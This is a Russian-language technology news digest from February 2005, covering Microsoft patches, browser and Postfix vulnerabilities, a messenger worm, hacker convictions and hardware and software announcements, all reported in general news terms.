Cоздатель языка программирования Java James Gosling (одновременно CTO Sun’s Developer Products) заявил, что планы Microsot сделать в качестве основного языка исполнения для платформы (common language runtime) .NET C и C++ является огромной дырой в безопасности и самой большой ошибкой. Как утверждает Гослинг, сами по себе языки программирования С и С++ унаследовали от своих предков (и более ранних самих же себя) недостатки, которые не позволяют создавать безопасные приложения (в отичие от Джава, например, который изначально делался с упором на исполнение своих апплетов в ограниченной среде ака "sand box"). Тем не менее, один из руководителей разработчиков Microsoft Charles Sterling не согласен с Гослингом, утверждая, что безопасность целиком зависит от того, как разработчик конкретного .NET-приложения позаботится о ней, применяя для этого базовую модель .NET, которая сама по себе является безопасной.
Подробности

9/02/2005 11:36 Intel расширяет семейство 64-разрядных процессоров Xeon
Во вторник компания сообщила, что в ближайшие три месяца она начнет продавать новые модели 64-разрядных процессоров Xeon для многопроцессорных серверов. Две версии Xeon с кодовыми названиями Potomac и Cranford должны появиться в системах в ближайшие 90 дней, сказал в интервью директор по маркетингу отделения Intel Digital Enterprise Group Фил Брейс. Впервые Intel ввела 64-разрядную поддержку, которая значительно увеличивает объем доступной серверу оперативной памяти, в 2004 году в модель Xeon Nocona для двухпроцессорных серверов. Однако четырехпроцессорные серверы скорее достигнут характерного для 32-разрядных процессоров предела емкости памяти в 4 Гбайт. Конкурирующая Advanced Micro Devices опередила Intel с 64-разрядными процессорами х86. Однако Intel по-прежнему лидирует на рынке серверов х86 и к концу февраля выпустит двухмиллионный 64-разрядный процессор, заявил Брейс. К тому же 64-разрядные чипы Intel х86 гораздо популярнее, чем более мощные 64-разрядные процессоры семейства Itanium, которые для эффективной работы требуют переписывания ПО. Семейство Itanium дебютировало в 2001 году, но за 2004 год их было продано меньше 200 тыс. штук. Новые процессоры предназначены для четырехпроцессорных серверов, причем Potomac рассчитан на тяжелые нагрузки, а Cranford предназначен для более дешевых машин. Разница между ними заключается главным образом в объеме быстродействующей кэш-памяти: у Potomac ее будет 8 Мбайт (это самый крупный кэш среди всех процессоров Xeon), а у Cranbrook меньше.
Подробности

9/02/2005 10:12 Microsoft планирует приобрести еще одну антивирусную компанию
Microsoft решила приобрести ещё одну антивирусную компанию. На сей раз предполагается компания Sybari Software, базирующаяся в East Northpor, штат Нью-Йорк. Антивирус, выпускаемый этой компанией, специализировался на отсекании вирусов и спама на почтовых серверах (технология Antigen file-filtering). Как сказал Mike Nash из Microsoft, "это позволит корпоративным клиентам Microsoft применять продвинутую контекстную и файлоориентированную фильтрацию на серверах". Напомним, что Microsoft в 2003 году приобрела румынскую антивирусную компанию GeCad, однако, несмотря на это до сих пор не выпустила обственного антивирусного продукта.
Подробности

9/02/2005 09:21 "Cтарые песни о главном" или Microsoft патчится
Ну вот, как мы и писали ранее - Microsoft разродилась очередной пачкой обновлений! Выпущено 12 обновлений - от MS05-04 до MS05-15. Примечательно, что 8(!) из них носят статус "кртические", остальные - "важные". Необходимо отметить, что это не рекорд, ибо в прошлом году Microsoft в одном из ежемесячных выпусков "осчастливила" адептов своих ОС 24-мя патчами. Патчи касаются следующих компонентов и систем: Microsoft .NET Framework, SharePoint Services, служба именованных каналов (named pipes), консоль Windows (Windows shell), Media Player и Windows Messenger, License Logging Service, клиент SMB (Server Message Block), OLE и COM (выпущены обновления Office XP/2003, Exchange), ActiveX, Internet Explorer (всех версий), Hyperlink Object Library. В число исправлений входит крупный кумулятивный патч, устраняющий несколько уязвимостей IE, которые уже стали достоянием гласности. Microsoft говорит, что широкого использования этих уязвимостей пока не наблюдается. Обновление для IE устраняет такие уязвимости, как возможность перехвата злоумышленником управления системой и установки программ; удаления или просмотра данных; а также создания новых учетных записей со всеми правами пользователя. Этим уязвимостям подвержен IE 6 с установленным Service Pack 1 на системах под Windows XP с Service Pack 1 или без него или Windows 2000 с Service Pack 4 или 3.
Бюллетени от Microsoft

9/02/2005 09:15 Китайские власти посадили студентов-хакеров в тюрьму на 10 лет
Власти Китая приговорили четверых студентов из вузов города Харбин к длительным срокам тюремного заключения за похищение денежных средств через Интернет. Как сообщает РИА "Новости" со ссылкой на китайскую газету "Жэньминь жибао", студенты были признаны судом виновными в похищении через Интернет свыше 64 тысяч долларов. Как установило следствие, около года назад молодые люди незаконно проникли в финансовую систему Промышленно-торгового банка Китая и самовольно перечислили деньги на свои счета, после чего обналичили их в том же банке. Через несколько дней один из студентов пришел в полицию с повинной и принес значительную часть похищенных денег. В тот же день были задержаны двое других преступников. Лидер группы скрылся и был задержан лишь осенью минувшего года. Суд приговорил хакеров к тюремным заключениям на срок от 10 до 15 лет. К 15 годам, в частности, приговорен лидер группы, который также Лидер группы понес самое суровое наказание - он приговорен к 15 годам тюрьмы с лишением политических прав сроком на три года и штрафу в размере около $6 тысяч.
Lenta.Ru

8/02/2005 17:22 Объявлен конкурс на логотип для FreeBSD
Объявлен конкурс на новый логотип проекта FreeBSD. Для конкурса был создан специальный сайт logo-contest.freebsd.org, на котором уже появился анонс с правилами, cообщает Nixp.Ru. Условия конкурса:
— Логотип должен быть узнаваемым.
— Логотип должен быть отправлен на конкурс его автором и нигде более не использоваться.
— Логотип должен быть представлен в векторном формате.
— Логотип должен хорошо выглядеть как в монохромном, так и в цветном виде.
— Логотип не должен противоречить культурным нормам (быть аморальным, пропагандировать расовую дискриминацию, содержать элементы порнографии и т.п.).
Завершится конкурс 15 марта 2005 в 23:59:59 (UTC).
Сайт проекта

8/02/2005 16:50 В Казахстане впервые обнаружили хакера
Впервые в истории Казахстана властям удалось поймать и осудить хакера. Как сообщает агентство «Казинформ», этот злоумышленник похитил крупную сумму денег через интернет, используя электронные платежные системы. По словам представителей начальника департамента криминальной полиции Казахстана, это первое в стране преступление такого рода. Впрочем, Дмитрия Кононихина можно назвать хакером лишь с большой натяжкой. Он работал кассиром в букмекерской конторе в маленьком казахском городке Лисаковск и, судя по всему, каким-то образом получил пароль доступа к чужому счету. Какая именно электронная платежная система была «взломана» — неизвестно, зато сообщается (дословно), что хакер «перевел системное время компьютера и воспользовался электронной почтой сети Интернет». В поимке хакера казахским сотрудникам из спецподразделения "К" помогли их российские коллеги. Сначала оперативники установили место, откуда злоумышленник выходил на связь, а потом на компьютере кассира провели компьютерную технико-криминалистическую экспертизу (эта процедура проводилась впервые истории Казахстана). Городской суд Лисаковска приговорил Дмитрия Кононихина к 5 годам условного лишения свободы, с испытательным сроком на 3 года.
"Вебпланета"

8/02/2005 16:34 Билла Гейтса обвинили в плагиате
Председатель Microsoft должен переименовать проект «Евронаука» (EuroScience), считают члены одноименной организации. Согласно проекту «Евронаука», анонсированному на прошлой неделе в Праге, Билл Гейтс профинансирует создание в Европе нескольких научно-исследовательских центров. Однако в Европе уже существует организация под таким названием — научный форум, членами которого являются более 2 тыс. человек, в том числе, несколько нобелевских лауреатов. Как заявил один из членов форума, «г-н Гейтс ведет активную борьбу с компьютерным пиратством, и поэтому, я уверен, что он не станет красть наше название». В настоящее время Microsoft ведет переговоры по данному вопросу, сообщила служба ВВС
BBC

8/02/2005 16:13 В Европе собралась чертова дюжина борцов со спамом
Антиспаммерские организации тринадцати стран Евросоюза договорились об объединении усилий в борьбе против так называемого "трансграничного спама". В антиспаммерскую коалицию вошли правоохранительные органы Австрии, Бельгии, Греции, Дании, Ирландии, Испании, Италии, Кипра, Литвы, Мальты, Нидерландов, Франции и Чехии. По замыслу организаторов, такое международное объединение позволит значительно облегчить задачу отлова и наказания спаммеров, работающих в пределах Европейского союза. Кроме того, создание коалиции предусматривает и упрощение процедуры рассмотрения жалоб на трансграничный спам – незаконные рассылки, приходящие из-за пределов данного национального государства. По информации журнала The Register, три четверти всей е-почтовой корреспонденции, отправленной в прошлом году, приходились на долю спама. В 2003 году этот показатель составлял всего 40 процентов.
Internet.Ru

8/02/2005 15:59 В .RU будет не более 15 регистраторов
7 февраля компания "Караван" получила статус аккредитованного регистратора в доменной зоне RU. "Увеличение количества регистраторов положительно скажется на развитии регистраторского рынка в целом, на повышении качества и предложении дополнительных услуг клиентам, - отметил специалист по работе с операторами связи Координационного центра национального домена сети Интернет Георгий Георгиевский. - Тем не менее, мы не стремимся к тому, чтобы количество регистраторов было очень большим. В идеале, нам бы хотелось видеть десяток - полтора десятка крупных компаний-регистраторов, которые бы устанавливали высокую планку качества и ответственности для всех остальных регистраторов". В рамках проведения реформы системы регистрации доменных имен, с 01 января 2005 года РосНИИРОС прекращает выполнять функции регистратора доменов второго уровня в домене RU и оставляет за собой только функции технического сопровождения системы регистрации и DNS-серверов зоны RU. Координационному центру национального домена сети Интернет переданы полномочия по выработке правил регистрации доменных имен в домене RU, аккредитации независимых регистраторов и разработке перспективных проектов, связанных с развитием российского национального домена.
Источник

8/02/2005 10:12 Вышла русскоязычная версия Microsoft Office OneNote 2003 Service Pack 1
Корпорация Microsoft объявила о начале продаж русскоязычной версии пакета Microsoft Office OneNote 2003 Service Pack 1, предназначенного для ведения иерархических заметок. В данную версию OneNote 2003 уже интегрирован пакет обновлений Service Pack 1, который включает последние исправления, усовершенствования системы безопасности и средства, повышающие надежность и производительность приложения. Первая версия данной программы появилась в конце 2003 года в рамках системы Microsoft Office 2003. Русская версия Microsoft OneNote была анонсирована в декабре прошлого года на конференции "Платформа 2005". Приложение OneNote 2003 позволяет записывать, упорядочивать и использовать электронные заметки на ноутбуках, настольных ПК и КПК. Приложение предоставляет область для заметок и средства их организации произвольным способом. Сервис-пак для OneNote вышел летом 2004 года. Обновленная версия Microsoft OneNote 2003 позволяет автоматически (при синхронизации) копировать в OneNote записи из КПК и смартфонов на базе Windows Mobile. Появилась также возможность импортировать фотографии и видео, снятые с помощью цифровых камер, а также скриншоты и отсканированные изображения. Улучшена интеграция OneNote с другими приложениями Microsoft Office. В заметки можно вставлять документы Word, Excel и PowerPoint. Пользователи также могут защищать блокноты с комментариями от несанкционированного доступа паролем и шифровать записи.
Анонс

8/02/2005 09:39 Уязвимость в преобразовании имён во многих браузерах
Eric Johanson сообщает об обнаружении уязвимости при преобразовании имён т.н. формата IDN (International Domain Name - интернациональная система доменных имён). Подобную систему именования доменов первой стал поддерживать крупнейший регистратор доменов Verisign. Разумеется, для поддержания подобных имён требуется ввести поддержку Unicode/UTF8 в URL в большинстве браузеров (называется в настоящий момент PUNYCODE). В настоящиё момент большинство браузеров на движках gecko/khtml поддерживают IDN, исключение составляет знаменитый IE, в котором, тем не менее, такая возможность реализована при помощи специального плагина (http://www.idnnow.com/index.jsp). Автором при поддержке группы Shmoo и Ghetto Hackers была обнаружена возможность подмены URL в ссылке и в сертификате SSL, что даёт широкие возможности для проведения фишинговых атак. В поле ссылки пользователь видит один URL, однако при попытке его посещения попадает на абсолютно другой сайт. Ранее возможность проведения подобного типа атак была описана господами из Израиля, которые дали название подобного вида атакам - "Homograph" (http://www.cs.technion.ac.il/~gabr/papers/homograph.html). В числе уязвимых браузеров были замечены: Мозилло-ориентированные - Firefox 1.0, Camino .8.5, Mozilla 1.6; Safari 1.2.5; Opera 7.54; Omniweb 5. Автор указывает возможность проверки того, находитесь ли вы под атакой. Для этого необходимо скопировать URL и вставить его, например в notepad (в OSX - терминальное окно). В качестве временной меры предосторожности можно в Mozilla отключить возможность 'network.enableIDN' (в других браузерах подобной возможности нет).
Описание уязвимости

8/02/2005 09:24 Бета-версия Longhorn выйдет в июне
В понедельник топ-менеджер Microsoft сообщил CNET News.com, что компания готовится к выпуску первой тестовой версии Windows следующего поколения в конце июня. Официально компания объявила, что Beta 1 Longhorn появится к концу 2005 года, однако ее внутренний план ориентирован на середину года. Выпуск финальной версии Longhorn намечен на второе полугодие будущего года. «Beta 1 Longhorn появится в первом полугодии этого года», — сказал директор отделения разработки Microsoft Джон Монтгомери в интервью на конференции VSLive, посвященной комплексу инструментов Visual Studio .Net. По кго словам, эта бета-версия будет предназначена главным образом для разработчиков. «Однако я думаю, что ИТ-подразделения тоже начнут к ней присматриваться, простукивать шины, разглядывать, что там есть, а чего нет». Beta 1 позволит впервые увидеть Longhorn в ее нынешнем виде. Предварительную версию следующей Windows Microsoft представила разработчикам на конференции Professional Developers Conference осенью 2003 года, а весной прошлого года обновила этот код. Однако с тех пор Longhorn претерпела существенные изменения. В августе Microsoft объявила, что меняются все три опорные колонны Longhorn. Два ее основных компонента — механизм представления информации Avalon и архитектура веб-сервисов Indigo — изъяты из следующей версии Windows и будут предлагаться отдельно как для Longhorn, так и для текущего поколения операционных систем Windows. Третий важный компонент, новая файловая система Windows WinFS, отложена на более поздний срок, и ее бета-тестирование начнется одновременно с выходом Longhorn. Когда WinFS будет интегрирована в Windows, пока не ясно.
Подробнее

8/02/2005 09:10 Российская цена на Mac mini на 150 долларов выше американской
Стали известны российские цены на представленные в начале января новые продукты фирмы Apple - компьютер Mac mini и mp3-плейер iPod shuffle. По сведениям интернет-издания "Компьютерра", Mac mini с процессором G4 1,25 ГГц будет поставляться по цене, эквивалентной 649 долларам США, Mac mini с процессором G4 1,42 ГГц - 799 долларам; iPod shuffle с объемом памяти 256 мегабайт оценивается в 119 долларов, в варианте с 1024 мегабайтами - 179 долларов. Отмечается, что в России Mac mini стоит, в среднем, дороже на 150 долларов, чем в США. Компания Apple в России объясняет это так называемой "зональной разницей". "В российскую цену входит еще и стоимость таможенных пошлин, доставка продукта в Россию плюс налоги. Например, в Англии данный продукт стоит еще дороже", - сообщил PR-менеджер российского представительства Apple Георгий Матвеев. Как сообщалось, объявленная в рамках американской презентации цена Mac mini G4 1,42 ГГц составляет 499 долларов, Mac mini G4 1,42 ГГц - 599 долларов. Американская цена двух упомянутых вариантов iPod shuffle - 99 и 149 долларов. Mac mini стал первым компьютером платформы Macintosh, ориентированным на массовый рынок - раньше эта платформа позиционировалась как "элитная" и цена самой дешевой машины линейки eMac составляла 799 долларов.
"Компьютерра"

7/02/2005 19:43 Spamhaus: "черные списки" спамеров бесполезны
Авторы непрошеных электронных посланий все шире применяют тактику, от которой пока нет защиты. Потоки рекламной корреспонденции устремляются в интернет с легальных адресов домашних пользователей, чьи компьютеры захвачены шпионскими программами, утверждают аналитики антиспамерской организации Spamhaus. По их мнению, подобные ухищрения, которые сейчас стали массовыми, сводят на нет все усилия по созданию «черных списков» спамерских адресов и дополнительные меры аутентификации пользователя. Спам рассылает якобы легальный пользователь. После захвата компьютера при помощи троянской программы, туда устанавливается модуль рассылки почты. Директор Spamhaus Стив Линфорд (Steve Linford) сказал, что интернет-провайдеры должны что-то делать для борьбы с этой проблемой, например, ограничить число отправляемых сообщений, или усложнить автоматическое нахождение троянским модулем адреса внутреннего почтового сервера для рассылки. Одним из решений Линфорд видит внедрение новой технологии «SMTP-аутентификации» (SMTP AUTH), которая требует входить на почтовый сервер, используя имя пользователя и пароль. Однако, троянскому коду ничего не стоит украсть этот пароль, сообщил Techtree.
CNews

7/02/2005 12:49 Результаты проверки качества исходников MySQL
Компания Coverity опубликовала результаты проверки качества исходников MySQL. В ходе анализа кода было выявлено 97 ошибок, из которых только одна может быть использована для нарушения безопасности, сообщает linux.org.ru. В целом, код MySQL признан хорошим (1 ошибка на 4000 строк), его качество оказалось гораздо выше среднего коммерческого проекта (от 1 до 7 ошибок на 1000 строк). Ранее проводилась проверка для Linux ядра, в результате которой было выявлено 985 ошибок в 5.7 миллионах строках кода, т.е. менее 1 ошибки на 10000 строк.
Подробности

7/02/2005 12:35 Sun обзаведется собственной базой данных?
Sun Microsystems намекнула на то, что она, возможно, предложит заказчикам собственную СУБД — шаг, способный вызывать неудовольствие Oracle, но играющий на руку движению open source. В среду на встрече с влиятельными финансовыми аналитиками глава Sun Скотт Макнили высказал провокационную идею. Во время своего выступления он продемонстрировал слайд, на котором рядом с перечнем существующих баз данных красовались слова Sun DB. Макнили не стал ничего объяснять и сказал только: «stay tuned», но президент Sun Джонатан Шварц отметил в интервью, что программное обеспечение базы данных — один из возможных способов выхода на новые территории программного обеспечения open source, которые планирует Sun. «По-моему, рынок наглядно подтвердил: open source — это одна из дорог, по которой желают ехать и сообщество разработчиков, и сообщество заказчиков, и мы сделаем все возможное, чтобы предоставить заказчикам максимальный выбор. Я не думаю, что надо ограничиваться только операционными системами. Возможно, имеет смысл заняться и файловыми системами, базами данных или промежуточным ПО». Аналитик Enterprise Strategy Group Уильям Харли уверен, что со временем Sun выпустит базу данных, чтобы расширить свой комплекс серверного ПО. Однако прямое столкновение с главой Oracle Ларри Эллисоном было бы безрассудством и маловероятно. «Я бы очень не советовал им покупать технологию СУБД, напрямую конкурирующую с Oracle», — сказал Харли. Если Sun станет выбирать партнера по базе данных, то среди альтернатив одна компания стоит особняком — это Computer Associates International, которая силится привлечь больше внимания к своей 30-летней базе данных Ingres, ставшей проектом open source. «Мы сотрудничаем с Sun, в том числе в области Ingres», — сказал старший вице-президент СА по разработке Тони Гохан.
ZDNet

7/02/2005 12:03 Законодатели защитят cookies от борцов со шпионскими программами
Американские законодатели планируют внести изменения в закон о шпионских технологиях в программном обеспечении, чтобы исключить из числа незаконных технологий cookies, сообщает сайт Silicon.com. Причиной пересмотра закона, который претерпел последние изменения в январе этого года, стало определение cookies. Наибольшую обеспокоенность этим определением высказали представители рекламных интернет-сетей. По их мнению, определение оказалось слишком размытым. Это может привести к ограничениям на использование технологий, которые позволяют оценивать эффективность рекламных кампаний, считают сторонники изменений в законе. «Определение в том виде, в каком оно было сформулировано, не затрагивало использования cookies третьей стороной (отличной от сервера и браузера пользователя). Существует целый ряд категорий игроков рынка, связанных с онлайновой рекламой, аналитикой и торговлей. Определение, данное для cookies в законопроекте, было и остается серьезной проблемой. И будет оставаться таковой, пока мы не увидим лучший вариант», — заявил исполнительный директор организации Network Advertising Initiative Тревор Хьюз (Trevor Hughes). Между тем, представители законодателей отмечают, что законопроект касается программного обеспечения для наблюдения, а не текстовых файлов. По сути, это ограничение исключает возможность того, что cookies, которые являются именно текстовой информацией, могут быть причислены к незаконным шпионским технологиям. Более того, в одном из разделов законопроекта авторы обращают особое внимание на то, что cookies — это файлы с данными. Несмотря на все заверения законодателей, члены Network Advertising Initiative, подчеркивают свою обеспокоенность. Их смущает то, что закон не дает специального определения для cookies, подготовленных третьей стороной. «Мы предполагаем внести изменения, которые смогут закрепить юридическое положение cookies», — заявляют в ответ законодатели.
Подробности

7/02/2005 11:45 Уязвимость в Postfix
Jean-Samuel Reynaud обнаружил уязвимость в исходном коде популярного в мире открытых систем MTA - Postfix. Из-за ошибки в обработке кода при работе с IPv6 пакетами может возникнуть ситуация, когда файл /proc/net/if_inet6 будет недоступен приложению (к примеру, при запуске в chroot-окружении, что часто делается в целях безопасности во многих дистрибутивах). При этом в случае задания значения опции "smtpd_recipient_restrictions" в значение "permit_mx_backup" в конфигурационном файле main.cf, сервер под управлением Postfix может превратиться в открытый ретранслятор (open relay) и может быть использован для доставки нежелательной почты (спама, проще говоря) любому MX-серверу, имеющему IPv6 cетевой адрес. Уязвимость исправлена в версии Postfix 2.1.4-5.
Описание уязвимости

7/02/2005 11:19 Уязвимости в браузерах Mozilla/Firefox
В браузерах Mozilla, Mozilla Firefox различных версий и почтовом клиенте Mozilla Thunderbird обнаружены несколько весьма опасных уязвимостей. Дыры теоретически обеспечивают возможность организации XSS-атак (Cross-Site Scripting) на удаленные компьютеры и, кроме того, позволяют получить несанкционированный доступ к конфиденциальной пользовательской или системной информации. Как сообщается, ошибки могут возникать при обработке запросов "407" на авторизацию, в процессе сохранения закладок в браузере, при обработке событий, связанных с нажатиями на среднюю кнопку мыши, и при использовании в запросах функции toString(). Кроме того, несколько уязвимостей выявлены в реализации протокола SSL, широко применяющегося для защиты информации в интернете. Злоумышленник, в частности, может подменить иконку защищенного соединения и выполнить на машине-жертве произвольные деструктивные операции. Наконец, почтовый клиент Mozilla Thunderbird некорректно обрабатывает запросы "куки" по протоколу HTTP (файлы "куки" используются для хранения некоторых сведений о пользователях интернета, например, информации об аккаунтах).
Подробности

7/02/2005 10:42 Администрация конкурента ICQ обнаружила взлом своего сервера
Сервер, на котором располагается сайт службы мгновенного обмена онлайновыми сообщениями Jabber, подвергся хакерской атаке. Jabber был взломан с помощью автоматизированного руткита (набора хакерских программ) еще более года назад, однако обнаружить взлом администраторы смогли лишь чуть более двух недель назад, сообщает газета Sydney Morning Herald. Согласно предварительному расследованию администраторов Jabber, хакеры не получили доступа к другим серверам службы — производственный сервер и сервер рассылки остались нетронутыми. По словам главы Jabber Software Foundation Питера Сан-Андре (Peter Saint-Andre), работа взломанного сервера приведена в норму, и сейчас доступ к нему имеют лишь несколько администраторов.
Источник

7/02/2005 10:06 Выход ClamAV 0.82
Как сообщает команда разработчиков лучшего, пожалуй, фриваре-антивируса с открытым исходным кодом ClamAV, ими выпущена обновлённая версия - 0.82. В ней включена возможность определения троянов, использующих уязвимость MS05-002 (уязвимость при обработке файлов иконок и курсоров), улучшена возможность обработки прикреплённых файлов (в 0.81 некторые атачменты, используемые червями, могли привести к завершению работы антивируса), улучшена работа с прокси-сервером утилиты freshclam (обновление баз), а также скорости соединения.
Анонс

6/02/2005 15:41 8 февраля Microsoft планирует опубликовать 13 новых патчей
На следующей неделе Microsoft опубликуют 13 новых патчей, из них 9 — для Windows. Остальные 4 патча предназначены для других приложений — от Visual Studio до MSN Messenger. Как сообщает ZDNet, как минимум один патч для Windows латает дыру, которой присвоена высшая степень опасности. Предварительное сообщение о выходе патчей — новое в информационной политике Microsoft. Как сообщил представитель компании, это делается для того, чтобы пользователи продуктов корпорации были максимально осведомлены о выходящих заплатках. На подходе также заплатка, которая устраняет дыру «средней степени опасности» в .Net Framework.
ZDNet

6/02/2005 15:20 Защищаться от хакеров в Молдове тоже не просто
В Молдове лишь 12 процентов компьютерных преступлений становятся предметом расследования правоохранительными органами. Как сообщил в ходе проходящего в Кишиневе международного семинара «Управление использованием Интернета» коммерческий директор АО «Молдтелеком» Георгий Супрунов, это невыгодно экономическим агентам, потому как полностью дискредитируют их бизнес. В последнее время АО «Молдтелеком» столкнулось с проблемой незаконного использования каналов IP-телефонии, через которые в республику «прокачивалось» значительное количество информации, дорогостоящие звонки. Часть этих несанкционированных прорывов блокировалась еще на подходе к Молдове международными станциями, но трафик идущий, скажем, из Европы, остановить весьма сложно. В АО «Молдтелеком» с недавних пор появилась собственная разработка – сервер, который фиксирует подозрительные «прокачки» данных. Для обеспечения необходимой безопасности компьютерных сетей предприятий, необходима четкая внутренняя регламентация их работы. Против хакеров также необходимо не просто защищаться, но делать это быстро и адекватно. К тому же нужны специально подготовленные полицейские. В Молдове есть достаточно полная законодательная база – действует закон «Об электросвязи», соответствующие поправки внесены в Уголовный кодекс, заявил Супрунов, передает агентство «НОВОСТИ-МОЛДОВА».
Crime-Research

6/02/2005 14:57 Процессор Cell для PlayStation 3 метит высоко
Инженеры Sony, IBM и Toshiba обещают сообщить подробности о процессоре Cell, который ляжет в основу следующей версии игровой приставки Sony PlayStation, но есть аналитик, которому уже сейчас хорошо известно, о чем пойдет речь. Том Хафхилл из Microprocessor Report изучил патенты и другие документы, относящиеся к процессору Cell, который будет представлен в понедельник на Международной конференции по твердотельным микросхемам в Сан-Франциско. Он полагает, что многие новшества, реализованные в этом чипе, способны существенно увеличить вычислительную мощность самых разнообразных устройств от игровых приставок до сотовых телефонов. Intel и другие производители процессоров уже работают над сдвоенными чипами, но Cell пошел на несколько шагов дальше, сделав обрабатывающие ядра относительно независимыми. В существующих конструкциях многоядерных чипов одна задача обычно разбивается на части, которые распределяются между разными вычислительными блоками. Вычислительные блоки Cell — называемые «софтверными ячейками» (software cells) — способны решать совершенно отдельные задачи. «Софтверные ячейки самодостаточны — они поддерживают нечто вроде роуминга», — говорит Хафхилл.
Подробности

6/02/2005 14:34 Билл Гейтс о свободном ПО
В письме, посвященном необходимости обеспечивать максимально свободное взаимодействие программного обеспечения (interoperability aka UNIX-way), глава Microsoft отметил, что его компания всегда старалась следовать этому принципу, тогда как движение свободного ПО зачастую создает искусственные препятствия (цитата): "the open source development approach encourages the creation of many permutations of the same type of software application, which could add implementation and testing overhead to interoperability efforts.", сообщает linux.org.ru. Также в письме отмечается важность XML как основы взаимодействия ПО в будущем.
Текс письма

6/02/2005 13:30 Открылся новый Underground-веблог
Как нам сообщили ребята из 29A (а также z0mbie и ht), сегодня открылся веблог их андэграунда. Как сообщает автор новости, веблог будет обновляться не очень часто, зато время от времени там будет появляться уникальный материал.
ANTIDEZA-веблог

6/02/2005 12:20 ФБР отказывается от своей электронной почты
ФБР официально объявило, что оно закрывает систему электронной почты, которую агентство использовало для общения с публикой. Причиной этому послужило опасение, что почтовые серверы могут быть уязвимы для проникновения извне. В настоящий момент в ФБР ведется внутреннее расследование, с целью выяснить, взламывал ли кто почтовую систему, использующую адрес fbi.gov. Эта система администрируется не ФБР, а частной компанией. Специальный агент Стив Лазарус, координатор ФБР по вопросам взаимодействия со СМИ пояснил, что ФБР использует эти учетные записи, чтобы "общаться с населением, просматривать интернет-сайты и заниматься другими делами, не связанными с секретной информацией, например, рассылать пресс-релизы". Лазарус добавил, что компьютеры ФБР, в которых хранятся дела, секретная информация и внутренние материалы не связаны с внешним миром. Сейчас ФБР начнет процесс перемены адреса электронной почты. Ранее, Министерство юстиции подвергло ФБР критике за то, что бюро тратит слишком много денег и времени на обновление своего компьютерного парка.
Lenta.Ru

5/02/2005 18:26 "Народный" макинтош Mac mini удалось разогнать
Бытует мнение, что такого понятия как "разгон Макинтошей" не существует. Тем не менее, разогнать компьютеры Apple, хотя и достаточно сложно, но все же возможно. И в очередной раз доказал это некто Лео Боднар, сумевший поднять частоту процессора недавно представленного "народного" ПК Mac mini более чем на 20 процентов. Компьютер Mac mini был представлен в начале января. В базовой комплектации Mac mini оснащается чипом PowerPC G4 с тактовой частотой 1,25 ГГц, 256 Мб оперативной памяти DDR SDRAM, винчестером емкостью 40 Гб, комбинированным приводом для оптических носителей DVD-ROM/CD-RW, графическим контроллером ATI Radeon 9200 с 32 Мб памяти, сетевым контроллером и модемом. Стоит устройство 500 долларов США. Эксперимент по разгону Mac mini, проведенный Боднаром, заключался в увеличении множителя, формирующего частоту процессора. Для этого энтузиасту пришлось изменить конфигурацию "джамперов" (резисторов) на материнской плате. Выпаяв два из них, Боднар смог поднять частоту чипа PowerPC G4 до 1,58 ГГц, то есть примерно на 20 процентов. Однако после этого компьютер стал работать нестабильно, и частоту пришлось снизить до 1,42 ГГц. То есть, реальный прирост производительности процессора составил около 14 процентов. При этом, отмечает Боднар, "мак" функционировал вполне нормально, да и температура чипа, если и увеличилась, то совсем незначительно.
"Компьюлента"

5/02/2005 15:21 Exler.ru освоил карманный формат
Популярный авторский проект Алекса Экслера обзавелся специальной версией, адаптированной к просмотру на КПК. Планов по освоению WAP ни у самого Экслера, ни у кота Бублика нет. Теоретически идеи об открытии "карманной версии" сайта существовала давно. Как признается автор проекта, главным ускорителем процесса стал факт покупки КПК самим Экслером. КПК-версия не будет оторвана от основного сайта - это специальная трансляция материалов сайта в формат карманных компьютеров, которая делается автоматически. А саму трансляцию разработал бессменный администратор и программист проекта Exler.ru Олег Константинов. "Мы посчитали, что в wap-версии сайта нет необходимости, - говорит Алекс Экслер. - Пользователи смартфонов используют PDA-версию. А на wap все равно толком что-то прочитать невозможно, и wap, вообще, - явление умирающее. Промежуточный вариант". В КПК-версии будут отображены практически материалы "большого" Exler.ru, за исключением фотообзоров.
Internet.Ru

5/02/2005 14:17 Новый червь показывает цыпленка в бикини
Эксперты лаборатории PandaLabs зафиксировали появление вредоносных кодов Bropia.E и Gaobot.CTX, распространяющихся вместе. Bropia.E рассылает себя, используя программу обмена мгновенными сообщениями MSN Messenger, маскируясь под файл изображения с изменяющимся именем, выбираемым из длинного списка вариантов, с расширением .pif или .scr. Некоторые примеры названий этого файла: bedroom-thongs.pif, LMAO.pif и LOL.scr. Если пользователь запускает файл, он отображает изображение жареного цыпленка в бикини на экране. Однако это всего лишь прикрытие для маскировки настоящих действий, выполняемых червем. Вредоносный код рассылает себя по всем контактам MSN Messenger и создает на компьютере различные файлы, включая файл под названием winhost.exe, в действительности содержащий червя Gaobot.CTX. Gaobot.CTX выполняет действия, которые представляют серьезнейшую угрозу для компьютера, так как он подключается к каналу IRC и ждет команд от удаленного пользователя. Это позволяет хакеру скачивать все виды файлов на пораженный компьютер: шпионское и рекламное ПО, прочие вирусы и т.д. «Следует придерживаться железного правила: никогда не открывать файлы, полученные через системы мгновенных сообщений, предварительно не просканировав их обновленным антивирусом. Растущее количество вирусов использует эти приложения для распространения, и величайшая опасность заключается в том, что получатель запускает исполняемый файл не колеблясь, так как он отправлен с известного адреса. Этот факт также содержит в себе риск быстрого распространения через системы мгновенных сообщений, позволяя плохо защищенным сетям быть зараженными за считанные секунды», — предупреждает Луис Корронс, глава лаборатории PandaLabs. Так как международная сеть техподдержки уже зафиксировала инциденты, вызванные этим червем, Panda Software рекомендует пользователям принять меры предосторожности и обновить свое антивирусное ПО. Panda Software уже выпустила соответствующие обновления.
CNews

5/02/2005 13:22 JVM не будет поддерживать Python
Гослинг заявил что в планы развития платформы Java не входит реализация поддержки каких-либо скриптовых языков виртуальной машиной (JVM), несмотря на то что необходимость подобного шага давно назрела, пишет linux.org.ru. В качестве основного довода в поддержку этой позиции Гослинг называет нежелание вызвать недовольство одних, оказав поддержку другим кандидатам, основными среди которых являются Python и Groovy. Стоит отметить, что в случае выпуска исходных кодов JVM под свободной лицензией подобная проблема возникнуть не смогла бы.
Подробнее

5/02/2005 13:00 Sun наносит последние штрихи на процессоры Sparc следующего поколения
